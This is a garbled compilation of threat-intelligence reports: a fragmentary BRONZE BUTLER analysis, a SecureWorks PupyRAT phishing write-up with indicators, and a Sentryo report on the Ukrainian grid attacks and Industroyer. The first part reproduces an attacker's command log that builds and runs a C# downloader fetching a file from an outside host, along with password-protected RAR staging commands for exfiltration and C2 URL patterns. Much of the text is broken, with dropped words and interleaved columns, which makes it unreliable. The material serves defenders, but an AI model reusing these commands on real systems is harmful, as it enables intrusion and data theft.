c:\PerfLogs\Admin>echo namespace downloader >>do.cs
c:\PerfLogs\Admin>echo { >>do.cs && echo
class Program >>do.cs && echo
{ >>
do.cs
c:\PerfLogs\Admin>echo
static void Main(string[] args) >>do.cs && echo
{ >>do.cs && echo
WebClient client = new WebClient(); >>do.cs
c:\PerfLogs\Admin>echo
string URLAddress = @""http://bulgaria-ecotour.c
om/img/a0.gif""; >>do.cs
c:\PerfLogs\Admin>echo
string receivePath = @""C:\perflogs\admin\""; >>
do.cs
c:\PerfLogs\Admin>echo
client.DownloadFile(URLAddress, receivePath + Sy
stem.IO.Path.GetFileName >>do.cs && echo
(URLAddress)); >>do.cs && echo
} >>do.cs && echo
} >>do.cs && echo } >>do.cs
c:\PerfLogs\Admin>cd \
c:\>dir csc.exe /s
c:\>cd c:\Windows\Microsoft.NET\Framework\v3.5
c:\Windows\Microsoft.NET\Framework\v3.5>csc.exe /out:c:\perflogs\admin\do.exe c:\pe
rflogs\admin\do.cs
c:\Windows\Microsoft.NET\Framework\v3.5>cd c:\perflogs\admin\ && do.exe
%TEMP%
DELL, HP, Intel
BRONZE BUTLER
Mimikatz
WCE
Windows Credential Editor
Mimikatz
[by
Source: SecureWorks
Active Directory
(KRBTGT)
TGT
bgtras
bgtrs
kkir
kisetr
netkin
orumls
wert
(KRBTGT)
BRONZE BUTLER
ping
net
RAT
[by
Source: SecureWorks
BRONZE BUTLER
schtasks
net use
copy
net time
schtasks
Page 11
RAT
zrun.bat
[by
Source:
SecureWorks
[by
Source:
SecureWorks
schtasks
C:\Users\user01\AppData\Local\Temp\msupdat> move 2016xxxx.exe \\192.168.0.1\d$\
.exe
4.5
BRONZE BUTLER
RAT
RAT
RAR
> r.dat x qscr.rar
RAR 3.70
Copyright (c) 1993-2007 Alexander Roshal
Shareware version
Type RAR -? for help
22 May 2007
Extracting from qscr.rar
Extracting
20160712-ssd.txt (
> r.dat a -v500K -hp1qazxsw2 ta @20160712-ssd.txt
RAR 3.70
Copyright (c) 1993-2007 Alexander Roshal
Shareware version
Type RAR -? for help
22 May 2007
r.dat
WinRAR
RAR
500k
1qazxsw2
20160712-ssd.txt
SecureWorks
BRONZE BUTLER
1234qwer
1234qwer!
1234$%qwer
1qazxsw2
1qazxcde32ws
Page 13
RAR
BRONZE BUTLER
RAR
HTTP POST
URL
RAR
Datper
xxmm
Datper
xxmm
2017
30
USB
SecureWorks
BRONZE BUTLER
https://www.npa.go.jp/cyberpolice/detect/pdf/20170330.pdf
4.6
BRONZE BUTLER
RAR
del
BRONZE BUTLER
BRONZE BUTLER
BRONZE BUTLER
5.1
JPCERT
SecureWorks
CSIRT
Computer Security Incident Response Team /
www.nca.gr.jp
CSIRT
JPCERT
Page 15
SecureWorks
BRONZE BUTLER
HTTP
Windows
Windows
SecureWorks
GET
Squid
GET
DHCP
IP
Windows
NTLM
Kerberos
Microsoft
Sysmon
BRONZE BUTLER
Sysmon
Windows
Sysmon
Sysmon
https://technet.microsoft.com/en-us/sysinternals/sysmon.aspx
BRONZE BUTLER
Appendix A:
URL
User Agent
BRONZE BUTLER
SKYSEA Client View
Active Directory
BRONZE BUTLER
Windows
BRONZE BUTLER
SecureWorks
AETD Red Cloak
https://www.secureworks.jp/capabilities/managed-security/endpointsecurity/red-cloak
AMPD
https://www.secureworks.jp/capabilities/managed-security/networksecurity/advanced-malware-protection
Page 17
net
ping
schtasks
Windows
Windows
Windows
(2015-12-02)
https://www.jpcert.or.jp/magazine/acreport-wincommand.html
BRONZE BUTLER
Active Directory
BRONZE BUTLER
Active Directory
2017
14
JPCERT
Active Directory
Active Directory
Active Directory
http://www.jpcert.or.jp/research/AD.html
SKYSEA Client View
SKYSEA
IP
SKYSEA Client View
Windows Firewall
IP
NAPT
5.2
5.1
JPCERT
C2
Daserf
Datper
xxmm
BRONZE BUTLER
Active Directory
Page 19
SecureWorks
https://www.secureworks.jp/capabilities/incident-response/incidentmanagement/targeted-threat-hunting
Daserf
Datper
xxmm
Kerberos
JPCERT
Active Directory
krbtgt
Silver
Active Directory
http://www.jpcert.or.jp/research/AD.html
BRONZE BUTLER
BRONZE BUTLER
BRONZE BUTLER
Page 21
Appendix A:
BRONZE BUTLER
JPCERT
BRONZE BUTLER
HTTP
URL
SecureWorks
Appendix
Gofarer
Daserf
URL
http://<
>.php
http://<
>.gif
http://<
>.asp
http://<
>.php?id=<8
16
>&<4
Mozilla/4.0+(compatible;+MSIE+
8.0;+Windows+NT
+6.1;+Trident/4.0;+SLCC2;+.NET
+CLR+2.0.50727;
+.NET4.0E)
Mozilla/4.0 (compatible; MSIE 8.
0; Windows NT 6.0; SV1)
>=.php?<
>=<16
16
http://<
>.php?<
>=<16
16
Base64
xxmm
http://<
>.php?t0=<8
16
>&t1=<
2=<8
16
&t3=<
>&t6=<
http://<
>.php?id0=<8
16
>&id1=<
id2=<8
16
&id3=<
>&id6=<
http://<
>.php?idcard0=<8
16
>&idcard1
>&idcard2=<8
16
&idcard3=<
>&idcard6=<
http://<
>.php?item0=<8
16
>&item1=<
>&item2=<8
16
&item3=<
>&item6=<
http://<
>.php?ps0=<8
16
>&ps1=<
&ps2=<8
16
&ps3=<
>&ps6=<
http://<
>.php?h=<8
16
>&o=<
>&w=
16
&a=<
>&y=<
http://<
>/id0/<8
16
>/id1/<
>/id2/
16
/id3/<
>/id6/<
http://<
>l/logo-unix.php
Mozilla/4.0 (compatible; MSIE 8.
0; Windows NT 6.0; SV1)
BRONZE BUTLER
HTTP
URL
SecureWorks
Appendix
BRONZE BUTLER
dat
C:\Intel\IntelUpdata.exe
C:\Intel\Logs\hlog.exe
C:\Intel\Logs\IntelLogSrv.exe
C:\Intel\ExtremeGraphics\CUI\a.dat
C:\PerfLogs\Admin\PerfLogs.exe
C:\Program Files\Adobe\Reader 11.0\Reader\adobe.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Readersl.exe
C:\Program Files\Common Files\Java\Java Update\jusctray.exe
C:\Program Files\Common Files\Justsystem\JustOnlineUpdate\JustsystemUpdate.exe
C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\MSBlESAD.VBE
C:\Program Files\CONEXANT\SAII\urllog.vbe
C:\Program Files\Internet Explorer\jsExport.exe
C:\Program Files\Internet Explorer\ieupset.exe
C:\Program Files\NVIDIA Corporation\nview\nvwrsc.exe
C:\Program Files\Windows NT\logonslmon.exe
C:\Program Files\Windows NT\usermd.exe
C:\Windows\system32\AdoRdUPD.exe
C:\Windows\system32\hwcomp.exe
C:\Windows\system32\javamon.exe
C:\Windows\system32\precui.exe
C:\Windows\system32\reader.exe
C:\Windows\system32\UACExec.exe
%TEMP%\MMoevde.exe
%TEMP%\ms<8
16
>.exe
%TEMP%\msensi\
%TEMP%\plug\AvUpdate.exe
>\msdtci.exe
C:\Windows\system32\
SKYSEA Client View
00000001.BIN
BRONZE BUTLER
SKYSEA
CtlCli.log
Page 23
1304:1500
2016/06/xx xx:xx:xx:384
ExecMacroThread.cpp
1304:1500
gram Files\Sky Product\SKYSEA Client View\tmp\00000001.BIN, PID=6251
App=C:\Pro
2016/06/xx xx:xx:xx:244
ExecMacroThread.cpp
Sysmon
BRONZE BUTLER
>.job
C:\Windows\system32\
.bat
.exe
Daserf
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curren
tVersion\Explorer
"MMID" = <
16
BRONZE BUTLER
VBE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Iranian PupyRAT Bites Middle Eastern Organizations
secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations
Threats & Defenses
Customized phishing lures distribute PupyRAT malware. Wednesday, February 15, 2017 By: Counter Threat Unit Research Team
SecureWorks
Counter Threat Unit
(CTU) researchers analyzed a phishing campaign that targeted a Middle Eastern organization
in early January 2017. Some of messages were sent from legitimate email addresses belonging to several Middle Eastern
organizations.
Campaign details
The threat actor used shortened URLs in the body of the phishing emails that redirected to several spoofed domains (See Table 1).
Spoofed domain
Legitimate domain
Associated organization
ntg-sa . com
ntg . com . sa
National Technology Group, a Saudi Arabian telecommunications company
itworx . com-ho . me
itworx . com
ITWorx, an Egyptian information technology services firm
mci . com-ho . me
mci . gov . sa
Saudi Ministry of Commerce
moh . com-ho . me
moh . gov . sa
Saudi Ministry of Health
mol . com-ho . me
mol . gov . sa
Saudi Ministry of Labor
Table 1. Spoofed domains hosted on 45 . 32 . 186 . 33. (Source: SecureWorks)
Recipients who clicked the URL were presented a Microsoft Office document related to the phishing theme (see Figures 1 and 2).
Figure 1. Job offer lure (MD5: 43fad2d62bc23ffdc6d301571135222c). (Source: SecureWorks)
Figure 2. Ministry of Health lure (MD5: 1b5e33e5a244d2d67d7a09c4ccf16e56). (Source: SecureWorks)
The downloaded document attempts to run a macro that then runs a PowerShell command. This command downloads two
additional PowerShell scripts that install PupyRAT, an open-source remote access trojan (RAT). According to the developer,
PupyRAT is a
multi-platform (Windows, Linux, OSX, Android), multi-function RAT and post-exploitation tool mainly written in
Python.
CTU
analysis confirms that PupyRAT can give the threat actor full access to the victim's system.
Conclusion
CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY
threat group (formerly labeled Threat Group-2889). CTU researchers assess with high confidence that COBALT GYPSY is
associated with Iranian government-directed cyber operations, and it has used tactics similar to this campaign:
targeting Saudi financial, oil, and technology organizations
using job-themed lures to infect systems
registering spoofed domains
spearphishing new victims using legitimate email addresses
This campaign highlights the need for organizations to educate users about the risks of spearphishing and shortened links. CTU
researchers recommend that organizations disable macros in Microsoft Office products to prevent attacks that leverage this
functionality. Organizations should also incorporate advanced malware prevention technology and endpoint threat detection tools as
part of their mitigation strategies.
Threat indicators
The indicators in Table 2 are associated with the PupyRAT campaign. The IP addresses and domains may contain malicious
content, so consider the risks before opening them in a browser.
Indicator
Type
Context
ntg-sa . com
Domain
name
Attacker-controlled spoofed website
itworx . com-ho . me
Domain
name
Attacker-controlled spoofed website
mci . com-ho . me
Domain
name
Attacker-controlled spoofed website
moh . com-ho . me
Domain
name
Attacker-controlled spoofed website
mol . com-ho . me
Domain
name
Attacker-controlled spoofed website
45 . 32 . 186 . 33
address
Hosting spoofed domains used in
PupyRAT phishing campaign
139 . 59 . 46 . 154
Address
Hosting PowerShell stages of
PupyRAT download
89 . 107 . 62 . 39
Address
PupyRAT command and control
server
43fad2d62bc23ffdc6d301571135222c
hash
Job-themed Word document lure
(qhtma) delivering PupyRAT
735f5d7ef0c5129f0574bec3cf3d6b06b052744a
SHA1
hash
Job-themed Word document lure
(qhtma) delivering PupyRAT
e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6
SHA256
hash
Job-themed Word document lure
(qhtma) delivering PupyRAT
1b5e33e5a244d2d67d7a09c4ccf16e56
hash
Ministry of Health lure
(Health_insurance_registration.doc)
delivering PupyRAT
934c51ff1ea00af2cb3b8465f0a3effcf759d866
SHA1
hash
Ministry of Health lure
(Health_insurance_registration.doc)
delivering PupyRAT
66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b
SHA256
hash
Ministry of Health lure
(Health_insurance_registration.doc)
delivering PupyRAT
03ea9457bf71d51d8109e737158be888
hash
Password-themed lure
(Password_Policy.xlsm) delivering
PupyRAT
d20168c523058c7a82f6d79ef63ea546c794e57b
SHA1
hash
Password-themed lure
(Password_Policy.xlsm) delivering
PupyRAT
6c195ea18c05bbf091f09873ed9cd533ec7c8de7a831b85690e48290b579634b
SHA256
hash
Password-themed lure
(Password_Policy.xlsm) delivering
PupyRAT
97cb7dc1395918c2f3018c109ab4ea5b
hash
PupyRAT (pupyx86.dll)
3215021976b933ff76ce3436e828286e124e2527
SHA1
hash
PupyRAT (pupyx86.dll)
8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71
SHA256
hash
PupyRAT (pupyx86.dll)
Table 2. Threat indicators for the Iranian PupyRAT campaign.
Gauging confidence level
CTU researchers have adopted the grading system published by the U.S. Office of the Director of National Intelligence to indicate
confidence in their assessments:
High confidence generally indicates that judgments are based on high-quality information, and/or that the nature of the issue
makes it possible to render a solid judgment. A "high confidence" judgment is not a fact or a certainty, however, and such
judgments still carry a risk of being wrong.
Moderate confidence generally means that the information is credibly sourced and plausible but not of sufficient quality or
corroborated sufficiently to warrant a higher level of confidence.
Low confidence generally means that the information's credibility and/or plausibility is questionable, or that the information is
too fragmented or poorly corroborated to make solid analytic inferences, or that [there are] significant concerns or problems
with the sources.
THREAT INTELLIGENCE REPORT
CYBERATTACKS AGAINST
UKRAINIAN ICS
BY VYTAUTAS BUTRIMAS
SUBJECT MAT TER EXPERT,
RESEARCH AND LESSONS LEARNED
DIVISION, NATO ENERGY SECURITY
CENTER OF EXCELLENCE 1
Since 2008 we have seen a steady progression in the severity and scale of
cyberattacks on critical infrastructure.
In 2010 Stuxnet malware was placed at a nuclear enrichment facility in Iran that
tampered with the control of equipment used in a critical process resulting in physical
damage. In 2012, malware was used to erase the data on 30,000 computers belonging
to one of the world
s largest energy companies. Since 2011 malware has been found
searching the Internet for locations of particular brands of industrial control equipment.
In 2014 the control systems of a German steel mill were compromised denying view
and control of equipment which also resulted in physical damage. In the spring of 2015
a sophisticated cyber-attack targeted the communications systems of France
s national
TV network TV5Monde.
The trend for increasing threats from cyberspace is getting worse. Cyber-attacks on
critical infrastructure have also become associated with political and even military
conflict. In 2008 cyber-attacks coincided with a traditional military operation for the
first time in the Russian-Georgian War which arose out of a long political conflict
between the two countries over separatists in the Georgian provinces of Abkhazia and
South Ossetia.
The cyber-attack on Ukraine
s power grid just before Christmas in 2015 also occurred
in the same context of political-military conflict over Russia
s illegal annexation of the
Ukrainian province of Crimea. Of even greater concern is that these cyber incidents are
suspected to have been caused not by cyber criminals or student hackers but by state
supported advanced and persistent threat (APT) actors.
The successful cyber-attacks that took place against a Ukrainian regional power grid
in December 2015 and the apparently even more sophisticated follow up attack on the
Ukrainian capital nearly a year later is another serious wake-up call for security policy
practitioners. All of these wake-up calls are taking place in an increasingly militarized
cyberspace environment, with many nations treating it as a new domain for military
operations. Until the international community recognizes the seriousness of this new
threat and organizes its response to manage this unsettling trend in cyberspace, the
operators of critical infrastructure can take steps to reduce the risk and potential for
damage to their critical systems.
The cyber-attacks executed against the Ukrainian power grid and other sectors of
critical infrastructure in 2015 are examined with a purpose to derive some useful
lessons learned that can be applied by operators of critical infrastructure. In addition
to technical solutions, this paper also stresses the importance of information sharing
and proposes what policymakers can do to further support the technology based
efforts of operators and industry at the international level.
The views expressed by V. Butrimas are for NATO, NATO member countries, NATO partners, related private and public institutions and related individuals. These views
do not represent the opinions or policies of NATO or NATO ENSEC COE or any other institution. The views presented in the articles are those of the authors alone.
BY LAURENT HAUSERMANN
SENTRYO CO FOUNDER
Since Christmas 2015, the Sentryo Security Labs has analyzed in detail the various reports published by
different actors in the cybersecurity world and the available information from malware feeds, technical
blogs or social media regarding the Ukainian CyberAttacks. The resulting reports were part of the Threat
Monitoring service offered to paying Sentryo customers. Following the second wave of attacks in December
2016, the Sentryo team has decided to publish a public version of this report to share this review. This also
includes a technical part on the newly found malware called INDUSTROYER/CrashOverride supposedly
used during the second attack. This article also includes a section about the NotPetya attack which
recently targeted many Ukrainian businesses and companies doing business with Ukraine.
IT cybersecurity analysts tend to look at the attack vectors in depth. They provide great details about the
way attacks are developed focusing on the technical perspective. Is the design well made? Does it embed
lots of different hacking techniques (0day, obfuscation, etc.)? We think this approach is misleading in the
growing field of OT Monitoring cybersecurity. Attack vectors are definitely part of the problem but their
physical impact must be careful analysed. OT impacts safety, health and environment where IT is about data.
OT impact is about casualties not only money and data losses.
Moreover, fear mongering (i.e. tricks to have fear drive the sales process) is not part of the Sentryo culture.
That
s why we are being very careful and trying to distinguish what can be taken as true from what is,
because there is no other evidence, pure speculation. In this document, the reader will have an overview
of Facts and Claims made in the cybersecurity community and Sentryo
s views on the subject. Our goal is
also to share our analysis to the whole SCADA/ICS/DCS/OT security community. Threat intelligence shall be
seen as an ongoing public debate between different skilled experts such as instrumentation engineers,
control engineers, cybersecurity experts, CISOs, forensics gurus, etc.
We welcome any feedback or updates to this document and will definitely include all evidence that is
lacking in this version. This document also includes a great contribution that will stress the need for more
Threat Information Sharing. We warmly thank its author.
To ease the reading and provide a quasi executive summary, we will start with a detailed potential scenario
of the first 2015 attack which has been documented. Please note that 2016 incidents do not have enough
documentation to provide such a scenario description. It should also be noted that the attack campaign has
apparently continued since early january 2017 with new technical elements coming to light regularly.
Check out the Sentryo website to download the latest version.
At Sentryo, we remain committed to helping industrial asset owners, including when they face a crisis.
Do not hesitate to contact us!
EXECUTIVE SUMMARY: POTENTIAL
SCENARIO FOR THE FIRST AT TACK
FACTS & REPORTS
CLAIMS
2017 ANOTHER MASSIVE
INFECTION "NOTPETYA"
USING SENTRYO ICS CYBERVISION
TO COPE WITH SUCH AT TACKS
THE NEED OF THREAT INFORMATION
SHARING BY VYTAUTAS BUTRIMAS
CONCLUSION
Les contributeurs :
Laurent Hausermann - Sentryo Co-founder & COO / Patrice Bock - Sentryo Customer Success Manager
Romain Francoise - Sentryo CTO / Antoine de Nervaux - Sentryo Security Engineer
DUE TO THE ANALYSIS AND DATA DEVELOPED IN THE PRESENT DOCUMENT, WE ARE ABLE TO DESCRIBE
THE MOST PROBABLE AT TACK SCENARIO. INDEED, IT APPEARS THAT IT WAS TARGETING THE CORE OF THE
INDUSTRIAL NETWORK:
It started with a spear phishing
email campaign targeting IT
employees.
Finally, they performed a
telephone denial-of-service
attack on the call center right
after the attack occurred.
It infected the network using
BlackEnergy version 3.
The attackers used KillDisk to
delete the master boot record
of critical industrial systems,
delete logs and erase
software to communicate
with breakers.
At that point the attackers were
able to retrieve VPN credentials
to access the industrial
network.
They disabled backup power,
opened grid breakers and
overwrote serial-to-ethernet
firmware which is used
to manipulate
grid breakers.
he scale of the attack was able to cut power in a whole geographic area of Ukraine as three independent electricity distributors were
simultaneously attacked.
hey also used hacking techniques to support and amplify the cyberattack. Their goal was clearly to stop, or at least slow down, operations
during the power restore processes.
Finally, they performed a telephone denial-of-service attack on the call center. Citizens were not able to call their power operator thus
amplifying an already chaotic situation.
he impact of this attack was that more than 50 substations went offline and more than 200,000 homesremained without electricity
for a period of time. Ukrainian operators were able to restore power after 6 hours using manual on-site switches like in
the old days
THE DECEMBER 23 OUTAGE AT WESTERN UKRAINE
PRYKARPAT TYAOBLENERGO/ IVANO - FRANKIVSK PLANT
CUT POWER TO MANY CUSTOMERS FOR ABOUT SIX HOURS.
REPORTS VARY FROM 80,000 TO 1.4 MILLION CUSTOMERS
IMPACTED.
VARIOUS ANALYSTS, INCLUDING ESET, A WELL KNOWN
ANTIVIRUS VENDOR, HAVE PROVIDED DEEP ANALYSIS
OF THE MALWARE.
THEY FOUND THAT:
The malware was distributed by a
dropper
. This dropper was an Excel
macro embedded in a malicious
spreadsheet file.
An updated analysis found that there
was also an alternate attack based on a
Microsoft Word Document embedding
macros.
In reports about the December 2015
attack, the
dropper
used a variant of
the Black Energy (3rd version) trojan
(also called Lancafdo by Symantec). Black
Energy is not a new malware. It
s been
used since 2007 in various campaigns
including a famous one in 2014 against
energy companies. Black Energy enables
attackers to control their malware via a
control center (C&C or C2) and enables
them to do horizontal propagation
(moving from one computer to another).
In reports about a replica attack performed
in January 2016 (see next page for more
details), the compromission chain was
different and Black Energy was replaced
by a custom-made malware payload
based on a variant of the open-source
gcat backdoor. Incidentally, the spear
phishing email contained an invisible
PNG image to track when the victims
viewed the email and the PNG was hosted
on a server located in France and hosted
by Online SAS. The IP pointed to a domain
name associated with a Hong Kong
company which was probably a collateral
victim in this case (compromised web
server).
In the December campaign the attackers
launched a
wiper
named
KillDisk
Disakil
. This wiper is a destructive
malware. It is able to kill processes and
services on a server and also wipe (i.e.
format) the whole hard disk.
A known
feature
of Disakil is to stop
and delete a named service and write its
corresponding executable file on the hard
drive with random data in order to make
restoration of the system more difficult.
Disakil was used against the service
called
sec_service.exe
. This service
appears to belong to
Serial to Ethernet
Connector
software by Eltima. This
software allows access to remote serial
ports over network connections. These
kinds of
remote serial
connections are
used to pilot PLCs or RTUs which do not
have a way to connect via Ethernet (via a
dedicated module). This is quite common
in old installations that were deployed
before 2000.
As of April 2016, it is still unclear if
the attack itself (breaker opening)
was performed remotely using a
digital / computerized weapon or was the
result of a human and operational lapse
but the likelihood of a digital weapon is
high.
The organization NATO Cooperative Cyber
Defence Centre of Excellence (CCD COE)
has published a book called
Cyber War in
Perspective: Russian Aggression against
Ukraine
. From this book, a presentation
at the BlackHat 2016 conference was
performed:
Cyber War in Perspective:
Analysis from the Crisis in Ukraine
Kenneth Geers. This talk added some
interesting points to this analysis. Mainly,
the goal was also to steal VPN credentials
to SCADA; to change passwords to access
to the electric grid; to disable the backup
power; to overwrite the serial-to-ethernet
converter firmware; to open 3 circuit
breakers; to launch the killdisk and to
TDoS (Telephony Denial of Services)
customer call center. The impact was
more than 50 substations offline and
more than 200,000 homes without
electricity.
FACTS & REPORTS
ON DECEMBER 18, 2016 THE SECOND POWER OUTAGE OCCURRED IN UKRAINE CAUSING SOME BLACKOUTS IN
KIEV FOR LESS THAN ONE HOUR. THIS WAS THE TIME NEEDED FOR AN EXPERT TEAM TO GO ONSITE AND FIX
THE PROBLEM USING A MANUAL PROCEDURE.
This second attack was targeting another
grid company named Ukrenergo. This
incident caused multiple blackouts in the
Ukrainian capital - Kiev and a complete
power loss for the northern part of Kiev on
the right bank of the Dnieper river and the
surrounding region.
Experts of the grid company were able to
fix the situation in less than 1 hour with a
manual procedure. This emergency response
team was on site 30 minutes after the
outage.
The faulty component was the automation
control systems piloting a substation in
a village near the Kiev city. Automation
systems in such substations control how
power coming from power plants at high
voltage is transformed to lower voltage for
consumer and industrial use.
The main website of the power grid had
been unreachable for a couple of days
during and after the attack. The head of
Ukrenergo had to publish a quick statement
on Facebook (provided in the appendix).
When the situation had been recovered, the
company published an official statement
available on their website.
It states
Among the possible causes
of failure are considered hacking and
equipment malfunction (crashes). Timely
police were involved and conducted a
thorough investigation into the accident,
which will be to inform the public. By the
end of the official investigation into the
case management of all objects SE
Ukrenergo with automatic control system
was transferred to the local level.
In the middle of January Ukrenergo
confirmed that the source cause of this
power outage was malicious. The authors
are still undetermined.
accounts, and determine the penetration
point while tracing computers potentially
infected with malware in sleep mode.
So far, no huge technical details related to
the attack have been released publically.
Indeed Marina Krotofil from Honeywell and
Oleskii Yasinskiy from ISSP shared some
information confirming the attack without
going further concerning technical details
related to this attack.
According to CyberX, a targeted malware
campaign called BugDrop could have
been performed in the reconnaissance
phase. Indeed, the goal was to retrieve a
Based on an article from Reuters, maximum amount of information regarding
Ukrenergo said in comments emailed to the final target which was the power grid.
Reuters:
Preliminary findings indicate that The complexity of the malware was quite
workstations and Supervisory Control and impressive. Once the target was infected
Data Acquisition (SCADA) systems, linked through a targeted phishing campaign and
to the 330 kilowatt sub-station "North", the malware deployed, it retrieved a lot
were influenced by external sources outside of information from the network and also
normal parameters. [...] The analysis of the screenshots, documents, passwords and
impact of symptoms on the initial data of audio recordings using the microphone.
these systems indicates a premeditated and For each infected target, the data was
encrypted with Blowfish using a
user-ID
multilevel invasion
Law enforcement officials and cyber experts The exfiltration was performed through
are still working to compile a chronology Dropbox services. The assumption linking
of events, draw up a list of compromised this malware and the attack is detailed in
the claims section below.
FACTS & REPORTS
THE 12TH OF JUNE 2017, RESEARCHER ANTON CHEREPANOV FROM ESET PUBLISHED A COMPREHENSIVE
TECHNICAL REPORT REGARDING THE MALWARE CALLED INDUSTROYER. DRAGOS HAS ALSO PROVIDED
AN IN - DEPTH ANALYSIS UNDER THE NAME OF CRASHOVERRIDE.
THIS MALWARE IS PROBABLY LINKED TO THE DECEMBER 2016 UKRAINE AT TACK. INDEED, THIS MALWARE HAS
BEEN DESIGNED TO DISRUPT THE WORKING PROCESS OF INDUSTRIAL CONTROL SYSTEMS
USED IN ELECTRICAL SUBSTATIONS.
INDUSTROYER / CRASHOVERRIDE is the
first OT malware designed specifically to
attack electric grids.
This malware supports four differents
industrial protocols:
IEC 60870-5-101 (aka IEC 101)
IEC 60870-5-104 (aka IEC 104)
IEC 61850
OLE for Process Control Data Access
(OPC DA)
It is obvious that since the first 2015 attack
(using Blackenergy and Killdisk) and this
malware, there is a huge gap and attackers
have improved their capacities. The
malware is now able to control switches
and breakers. ESET have seen indications
that this malware could have been the tool
used by attackers to cause the power outage
in December 2016. The infection vector
remains unknown but the investigation is
still ongoing.
INSTALLS
MAIN BACKDOOR
Before going deeper into the malware, let
have a look at embedded components. As we
can see in the schematic below, the malware
embeds:
Two backdoors (C&C through HTTPS)
A launcher
A wiper
Four differents payloads corresponding
to four different industrial protocols
ADDITIONAL BACKDOOR
CONTROLS
ADDITIONAL TOOLS
INSTALLS
LAUNCHER
EXECUTES
DATA WIPER
EXECUTES
101 PAYLOAD
104 PAYLOAD
Source ESET: Simplified schematic of Win32 / Industroyer components
61850
PAYLOAD
OPC DA
PAYLOAD
Regarding the C&C it is interesting to note that a local
proxy configuration has been hardcoded in the malware.
The local proxy is the way to access the Internet from the
local network. This configuration is adapted to the local
network. The fact that the local proxy has been hardcoded
in the malware, means having technical knowledge about
the target. Due to this, we can conclude that it was a
targeted attack. In addition, without proper modification of
the malware, it cannot be used on another target.
Another interesting thing is the way the malware deploys
the backdoor to the victim to be able to spawn a shell,
download a file and execute a program. At the beginning,
when the backdoor is executed on the victim, it stays in
RAM and starts communicating with the C&C. At this
moment, through the C&C, information related to the victim
is exfiltrated and analyzed to find vulnerabilities on the
targeted system. Once found, the exploit is sent through
the backdoor (still in ram) to perform a privilege escalation.
And now the fun part begins:
n initial persistent backdoor (the main) is deployed to
replace a non-critical Windows service.
second persistent backdoor (the backup) is installed
through a malicious Microsoft Notepad on the victim.
Each time the Notepad is used the backdoor is also
executed.
IEC 101 PAYLOAD COMPONENT
IEC 104 PAYLOAD COMPONENT
The payload uses the IEC101 protocol (IEC 60870-5-101)
which is used for communications between industrial
control systems and remote terminal units. If the target
machine communicates with a RTU using IEC101, the
IEC101 payload is used. It parses a configuration file
created by the hacker to determine the process
s target,
it kills it and opens COM ports to communicate with
the RTU and also to prevent the original process from
communicating with the RTU. Once the communication
has been established, the malware sends IEC101 C_SC_
NA_1 and C_DC_NA_1 packets to switch off the RTU at
the specified Information Object Address (IOA).
This payload uses the IEC104 protocol (IEC 60870-5-104)
which is used to send IEC101 on a TCP/IP network. Similar
to the IEC101 payload, the DLL reads a configuration file
containing information regarding the target including
the IP address, the port, the ADSU (Application Service
Data Unit) and the operation. The goal of this payload
is to connect to a specified IP address and send packets
with the ASDU address to interact with the IOA to switch
it off. The OT impact is quite important. By using this
payload, the malware is able to communicate on the OT
network using the IEC104 protocol and to send orders to
breakers. At the same time, the malware is also able to
communicate on the IT network to receive orders from
the C&C servers located outside of the target.
IEC 61850 PAYLOAD COMPONENT
This payload uses the IEC 61850 standard. This
standard describes a protocol used for multi-vendor
communication among devices that perform protection,
automation, metering, monitoring, and control of
electrical substation automation systems. The 61850
payload uses only a small subset of the protocol to
produce its disruptive effect. The payload looks for a
configuration file defining targets and commands as seen
previously. If the payload does not find the file, it starts to
scan the network for TCP port 102 (used by IEC 61850).
Once found, the payload sends a connection request
packet using the COTP protocol. If successful, it sends a
InitiateRequest and a getNameList request to compile
a list of targets, variables and contents. Afterwards, the
payload parses received data for variables that contain
the strings CSW (corresponds to logical nodes used to
control circuit breakers and switches). For each of them
it will try a read and a write order to change the position
of the breaker.
OPC DA PAYLOAD COMPONENT
This last payload implements a client for the OPC Data
Access protocol. Once executed, the payload enumerates
all OPC servers and OPC items and the server. In the
payload source code, we can see that it is looking for
specific strings in OPC item names (ctlSelOn, ctlOperOn...).
These names may suggest an interest in ABB solutions
such as the MicroSCADA range. For each of the found
OPC items, the payload changes its states.
ON JUNE 27 TH , THE UKRAINIAN RADIO HOLOS STOLYTSY WERE
ABLE TO CONTINUE THE RADIO DIFFUSION USING
AN ANALOG RADIO EMETOR: THEIR MAIN SERVER
WAS INFECTED BY A MALWARE... NOTPETYA WAS BORN
Still in 2017, another massive attack has been performed against ukrainian critical infrastructure. Although the payload did not include
exploits targeting industrial systems, it did significantly impact manufacturing plants, as well in Ukraine as world-wide, with 6-figure losses
at several european corporations.
What happened: on June 27th, the main server of the Ukrainian radio Holos Stolytsy was infected by a malware. The radio was only able to
continue the diffusion using an analog radio emetor. This was
NotPetya
s first strike! Soon after this first detection, other infections were
quickly detected around the world. But NotPetya is not Petya: let
s not mix the original 2016 Petya ransomware and the one we are talking
about, which is not a ransomware, and therefore was named
NotPetya
Basically, a ransomware is a malware that prevents file usage (e.g. using encryption) and requests a ransom to decrypt them. Petya is a
ransomware published in March 2016. The one which started in June 27th is quite different although based on the ransomware Petya.
The main difference is the fact that it is not a ransomware. Once NotPetya is executed on a platform, it encrypts the whole hard drive but
does not exfiltrate or embed a method to decrypt stored data. It means that NotPetya
s authors were not interested in money.
NotPetya embeds an effective infection method using the same exploits that Wannacry uses, targetting Windows SMB. Unlike Wannacry,
NotPetya tries to exploit remote machines located on the same local network. But the main point is NotPetya has functionalities to
retrieve and exfiltrate passwords and some remote administration functionalities.
We can directly conclude that NotPetya was not designed to make money or to control a BotNet but instead to infect a precise target. The
initial infection vector came from a malicious update of the Ukrainian countability software M.E.Doc. Indeed, hackers took the control of a
M.E.Doc
s server update and infected an update with NotPetya.
This Ukrainian radio was not an isolated case. In fact, lots of Ukrainian institutions and companies have also been infected and, since
NotPetya continued to spread itself through SMB, the infection rate was quite high. Several French companies, like Saint Gobain, have also
been infected. As for previous attacks using the same vulnerability (Wannacry for instance), industrial systems were impacted, because of
